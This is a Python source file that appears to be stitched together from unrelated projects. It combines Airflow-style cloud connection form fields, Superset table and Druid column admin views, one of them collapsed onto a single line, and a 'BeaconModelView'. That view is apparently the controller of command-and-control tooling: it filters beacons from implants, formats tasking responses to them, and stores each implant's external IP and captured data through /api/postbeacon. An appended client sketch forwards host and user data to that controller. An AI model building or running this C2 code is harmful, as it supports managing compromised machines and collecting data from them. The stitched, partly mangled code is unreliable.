                    'Will be used instead of the OAuth token and SA JSON file path field if specified.',
    )
    extra__yandexcloud__service_account_json_path = StringField(
        lazy_gettext('Service account auth JSON file path'),
        widget=BS3TextFieldWidget(),
        description='Service account auth JSON file path. File content looks like '
                    '{"id": "...", "service_account_id": "...", "private_key": "..."}. '
                    'Will be used instead of the OAuth token if specified.',
    )
    extra__yandexcloud__oauth = PasswordField(
        lazy_gettext('OAuth Token'),
        widget=BS3PasswordFieldWidget(),
        description='User account OAuth token. Either this or the service account JSON must be specified.',
    )
    extra__yandexcloud__folder_id = StringField(
        lazy_gettext('Default folder ID'),
        widget=BS3TextFieldWidget(),
        description='Optional. This folder will be used to create all new clusters and nodes by default',
    )
    extra__yandexcloud__public_ssh_key = StringField(
        lazy_gettext('Public SSH key'),
        widget=BS3TextFieldWidget(),
        description='Optional. This key will be placed on all created Compute nodes '
                    'to let you have a root shell there',
    )
    extra__kubernetes__in_cluster = BooleanField(
        lazy_gettext('In cluster configuration'))
    extra__kubernetes__kube_config_path = StringField(
        lazy_gettext('Kube config path'), widget=BS3TextFieldWidget())
    extra__kubernetes__kube_config = StringField(
        lazy_gettext('Kube config (JSON format)'), widget=BS3TextFieldWidget())
    extra__kubernetes__namespace = StringField(
        lazy_gettext('Namespace'), widget=BS3TextFieldWidget())
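# A minimal sketch (assumption: simplified from how Airflow persists these fields) of
# folding the extra__{conn_type}__* inputs above into the single `extra` JSON blob.
import json

def build_extra(form_data, conn_type):
    """Collect extra__<conn_type>__<name> entries from submitted form data."""
    prefix = "extra__%s__" % conn_type
    return json.dumps({k: v for k, v in form_data.items() if k.startswith(prefix)})

# e.g. build_extra({"extra__jdbc__drv_path": "/opt/drivers/h2.jar", "host": "db"}, "jdbc")
# -> '{"extra__jdbc__drv_path": "/opt/drivers/h2.jar"}'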
class TableModelView(DatasourceModelView, DeleteMixin, YamlExportMixin):
    datamodel = SQLAInterface(models.SqlaTable)
    include_route_methods = RouteMethod.CRUD_SET

    list_title = _("Tables")
    show_title = _("Show Table")
    add_title = _("Import a table definition")
    edit_title = _("Edit Table")

    list_columns = ["link", "database_name", "changed_by_", "modified"]
    order_columns = ["modified"]
    add_columns = ["database", "schema", "table_name"]
    edit_columns = [
        "table_name", "sql", "filter_select_enabled", "fetch_values_predicate",
        "database", "schema", "description", "owners", "main_dttm_col",
        "default_endpoint", "offset", "cache_timeout", "is_sqllab_view",
        "template_params",
    ]
    base_filters = [["id", DatasourceFilter, lambda: []]]
    show_columns = edit_columns + ["perm", "slices"]
    related_views = [
        TableColumnInlineView,
        SqlMetricInlineView,
        RowLevelSecurityFiltersModelView,
    ]
    base_order = ("changed_on", "desc")
    search_columns = ("database", "schema", "table_name", "owners", "is_sqllab_view")
    description_columns = {
        "slices": _(
            "The list of charts associated with this table. By "
            "altering this datasource, you may change how these associated "
            "charts behave. "
            "Also note that charts need to point to a datasource, so "
            "this form will fail at saving if removing charts from a "
            "datasource. If you want to change the datasource for a chart, "
            "overwrite the chart from the 'explore view'"),
        "offset": _("Timezone offset (in hours) for this datasource"),
        "table_name": _("Name of the table that exists in the source database"),
        "schema": _(
            "Schema, as used only in some databases like Postgres, Redshift "
            "and DB2"),
        "description": Markup(
            'Supports <a href="https://daringfireball.net/projects/markdown/">'
            "markdown</a>"),
        "sql": _(
            "This field acts as a Superset view, meaning that Superset will "
            "run a query against this string as a subquery."),
        "fetch_values_predicate": _(
            "Predicate applied when fetching distinct values to "
            "populate the filter control component. Supports "
            "jinja template syntax. Applies only when "
            "`Enable Filter Select` is on."),
        "default_endpoint": _(
            "Redirects to this endpoint when clicking on the table "
            "from the table list"),
        "filter_select_enabled": _(
            "Whether to populate the filter's dropdown in the explore "
            "view's filter section with a list of distinct values fetched "
            "from the backend on the fly"),
        "is_sqllab_view": _(
            "Whether the table was generated by the 'Visualize' flow "
            "in SQL Lab"),
        "template_params": _(
            "A set of parameters that become available in the query using "
            "Jinja templating syntax"),
        "cache_timeout": _(
            "Duration (in seconds) of the caching timeout for this table. "
            "A timeout of 0 indicates that the cache never expires. "
            "Note this defaults to the database timeout if undefined."),
    }
    label_columns = {
        "slices": _("Associated Charts"),
        "link": _("Table"),
        "changed_by_": _("Changed By"),
        "database": _("Database"),
        "database_name": _("Database"),
        "changed_on_": _("Last Changed"),
        "filter_select_enabled": _("Enable Filter Select"),
        "schema": _("Schema"),
        "default_endpoint": _("Default Endpoint"),
        "offset": _("Offset"),
        "cache_timeout": _("Cache Timeout"),
        "table_name": _("Table Name"),
        "fetch_values_predicate": _("Fetch Values Predicate"),
        "owners": _("Owners"),
        "main_dttm_col": _("Main Datetime Column"),
        "description": _("Description"),
        "is_sqllab_view": _("SQL Lab View"),
        "template_params": _("Template parameters"),
        "modified": _("Modified"),
    }
    edit_form_extra_fields = {
        "database": QuerySelectField(
            "Database",
            query_factory=lambda: db.session().query(models.Database),
            widget=Select2Widget(extra_classes="readonly"),
        )
    }

    def pre_add(self, table):
        with db.session.no_autoflush:
            table_query = db.session.query(models.SqlaTable).filter(
                models.SqlaTable.table_name == table.table_name,
                models.SqlaTable.schema == table.schema,
                models.SqlaTable.database_id == table.database.id,
            )
            if db.session.query(table_query.exists()).scalar():
                raise Exception(get_datasource_exist_error_msg(table.full_name))

        # Fail before adding if the table can't be found
        try:
            table.get_sqla_table_object()
        except Exception as e:
            logger.exception(f"Got an error in pre_add for {table.name}")
            raise Exception(
                _(
                    "Table [{}] could not be found, "
                    "please double check your "
                    "database connection, schema, and "
                    "table name, error: {}"
                ).format(table.name, str(e)))

    def post_add(self, table, flash_message=True):
        table.fetch_metadata()
        security_manager.add_permission_view_menu("datasource_access", table.get_perm())
        if table.schema:
            security_manager.add_permission_view_menu("schema_access", table.schema_perm)
        if flash_message:
            flash(
                _(
                    "The table was created. "
                    "As part of this two-phase configuration "
                    "process, you should now click the edit button by "
                    "the new table to configure it."
                ),
                "info",
            )

    def post_update(self, table):
        self.post_add(table, flash_message=False)

    def _delete(self, pk):
        DeleteMixin._delete(self, pk)

    @expose("/edit/<pk>", methods=["GET", "POST"])
    @has_access
    def edit(self, pk):
        """Simple hack to redirect to explore view after saving"""
        resp = super(TableModelView, self).edit(pk)
        if isinstance(resp, str):
            return resp
        return redirect("/superset/explore/table/{}/".format(pk))

    @action("refresh", __("Refresh Metadata"), __("Refresh column metadata"), "fa-refresh")
    def refresh(self, tables):
        if not isinstance(tables, list):
            tables = [tables]
        successes = []
        failures = []
        for t in tables:
            try:
                t.fetch_metadata()
                successes.append(t)
            except Exception:
                failures.append(t)
        if len(successes) > 0:
            success_msg = _(
                "Metadata refreshed for the following table(s): %(tables)s",
                tables=", ".join([t.table_name for t in successes]),
            )
            flash(success_msg, "info")
        if len(failures) > 0:
            failure_msg = _(
                "Unable to retrieve metadata for the following table(s): %(tables)s",
                tables=", ".join([t.table_name for t in failures]),
            )
            flash(failure_msg, "danger")
        return redirect("/tablemodelview/list/")
class DruidColumnInlineView(CompactCRUDMixin, SupersetModelView): datamodel = SQLAInterface(models.DruidColumn) include_route_methods = RouteMethod.RELATED_VIEW_SET list_title = _("Columns") show_title = _("Show Druid Column") add_title = _("Add Druid Column") edit_title = _("Edit Druid Column") list_widget = ListWidgetWithCheckboxes edit_columns = [ "column_name", "verbose_name", "description", "dimension_spec_json", "datasource", "groupby", "filterable", ] add_columns = edit_columns list_columns = ["column_name", "verbose_name", "type", "groupby", "filterable"] can_delete = False page_size = 500 label_columns = { "column_name": _("Column"), "type": _("Type"), "datasource": _("Datasource"), "groupby": _("Groupable"), "filterable": _("Filterable"), } description_columns = { "filterable": _( "Whether this column is exposed in the `Filters` section " "of the explore view." ), "dimension_spec_json": utils.markdown( "this field can be used to specify " "a `dimensionSpec` as documented [here]" "(http://druid.io/docs/latest/querying/dimensionspecs.html). " "Make sure to input valid JSON and that the " "`outputName` matches the `column_name` defined " "above.", True, ), } add_form_extra_fields = { "datasource": QuerySelectField( "Datasource", query_factory=lambda: db.session.query(models.DruidDatasource), allow_blank=True, widget=Select2Widget(extra_classes="readonly"), ) } edit_form_extra_fields = add_form_extra_fields def pre_update(self, item: "DruidColumnInlineView") -> None: # If a dimension spec JSON is given, ensure that it is # valid JSON and that `outputName` is specified if item.dimension_spec_json: try: dimension_spec = json.loads(item.dimension_spec_json) except ValueError as ex: raise ValueError("Invalid Dimension Spec JSON: " + str(ex)) if not isinstance(dimension_spec, dict): raise ValueError("Dimension Spec must be a JSON object") if "outputName" not in dimension_spec: raise ValueError("Dimension Spec does not contain `outputName`") if "dimension" not in dimension_spec: raise ValueError("Dimension Spec is missing `dimension`") # `outputName` should be the same as the `column_name` if dimension_spec["outputName"] != item.column_name: raise ValueError( "`outputName` [{}] unequal to `column_name` [{}]".format( dimension_spec["outputName"], item.column_name ) ) def post_update(self, item: "DruidColumnInlineView") -> None: item.refresh_metrics() def post_add(self, item: "DruidColumnInlineView") -> None: self.post_update(item)
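# Illustrative only: a dimension_spec_json value that passes the pre_update() checks
# above: valid JSON, a dict, containing both "dimension" and an "outputName" equal to
# the row's column_name ("affiliate" is an invented example).
demo_dimension_spec = {
    "type": "default",
    "dimension": "affiliate_id",
    "outputName": "affiliate",  # must equal column_name, or pre_update raises ValueError
}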
class BeaconModelView(ModelView): datamodel = SQLAInterface(Beacon) base_permissions = [ 'can_list', 'can_show', 'can_add', 'can_edit', 'can_delete', 'can_post_beacon' ] edit_form_extra_fields = { 'beacon_filter': Field('Beacon Filter', widget=FilterBuilderWidget( beacon_filters=get_querybuilder_filters_json(), beacon_fields=get_all_beacon_fields_json()), validators=[validators.Required()], description=('Only incoming Beacon packets matching this ' 'filter will be processed')), 'beacon_data_mapping': Field('Beacon Data Mapping', widget=BeaconFieldsWidget(packet_fields=get_all_packet_fields(), beacon_fields=get_all_beacon_fields()), validators=[validators.Required(), BeaconDataMappingCheck()], description=('Extract message data based on the selected ' 'mapping schema')), 'response_data_type': SelectField( 'Response Type', choices=get_all_response_types(), description=( 'The protocol used for response messages to the implant'), widget=Select2Widget()), 'response_data_mapping': Field('Response Data Mapping', widget=ResponseFieldsWidget( packet_fields=get_all_packet_fields(), response_fields=get_all_task_fields()), validators=[validators.Required(), BeaconDataMappingCheck()], description=('Format response messages based on the selected ' 'mapping schema')) } add_form_extra_fields = { 'beacon_filter': Field('Beacon Filter', widget=FilterBuilderWidget( beacon_filters=get_querybuilder_filters_json()), validators=[validators.Required()], description=('Only incoming packets matching this filter will ' 'be processed as a Beacon')), 'beacon_data_mapping': Field( 'Beacon Data Mapping', widget=BeaconFieldsWidget(packet_fields=get_all_packet_fields(), beacon_fields=get_all_beacon_fields()), validators=[validators.Required(), BeaconDataMappingCheck()], description=( 'Extract message data based on the selected mapping schema')), 'response_data_type': SelectField( 'Response Type', choices=get_all_response_types(), description=( 'The protocol used for response messages to the implant'), widget=Select2Widget()), 'response_data_mapping': Field( 'Response Data Mapping', widget=ResponseFieldsWidget(packet_fields=get_all_packet_fields(), response_fields=get_all_task_fields()), validators=[validators.Required(), BeaconDataMappingCheck()], description=( 'Format reply messages based on the selected mapping schema')) } edit_columns = [ 'name', 'beacon_filter', 'beacon_data_mapping', 'response_data_type', 'response_data_mapping' ] add_columns = [ 'name', 'beacon_filter', 'beacon_data_mapping', 'response_data_type', 'response_data_mapping' ] list_columns = [ 'name', 'beacon_filter', 'beacon_data_mapping', 'response_data_type', 'response_data_mapping' ] show_fieldsets = [('Filter', { 'fields': ['name', 'beacon_filter'] }), ('Beacon Data Mapping', { 'fields': ['beacon_data_mapping'] }), ('Task Data Mapping', { 'fields': ['response_data_type', 'response_data_mapping'] })] description_columns = {'name': 'Simple name for easy reference'} @action("muldelete", "Delete", "Delete all Really?", "fa-trash") def muldelete(self, items): if isinstance(items, list): self.datamodel.delete_all(items) self.update_redirect() else: self.datamodel.delete(items) return redirect(self.get_redirect()) @expose_api(name='post_beacon', url='/api/postbeacon', methods=['POST']) @has_access_api def post_beacon(self): """API used to send captured beacons from LP to Controller""" beacon = json_to_beacon(request.data) # Check if implant already exists implant = db.session.query(Implant).filter_by( uuid=beacon['uuid']).first() if implant: # Update 
existing implant implant.last_beacon_received = datetime.now() implant.external_ip_address = beacon['external_ip_address'] db.session.commit() else: # Add new implant implant = Implant(uuid=beacon['uuid']) db.session.add(implant) db.session.commit() # Store beacon data if 'data' in beacon: beacon_data = beacon['data'] if beacon_data: datastore = DataStore(implant=[implant], timestamp=datetime.now()) if is_ascii(beacon_data): datastore.text_received = beacon_data else: datastore.data_received = beacon_data db.session.add(datastore) db.session.commit() http_return_code = 200 response = make_response('Success', http_return_code) return response
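# A minimal client-side sketch (illustrative: only the fields read by post_beacon()
# above are used, and the controller URL is a placeholder) of how an LP could forward
# a captured beacon to this endpoint; assumes the `requests` package is available.
import requests

def _demo_forward_beacon():
    beacon = {
        "uuid": "9f8d2c0edemo",
        "external_ip_address": "198.51.100.7",
        "data": "hostname=WS01;user=alice",
    }
    # post_beacon() answers 'Success' with HTTP 200 once the implant and data are stored
    resp = requests.post("http://controller:8080/api/postbeacon", json=beacon)
    return resp.status_code == 200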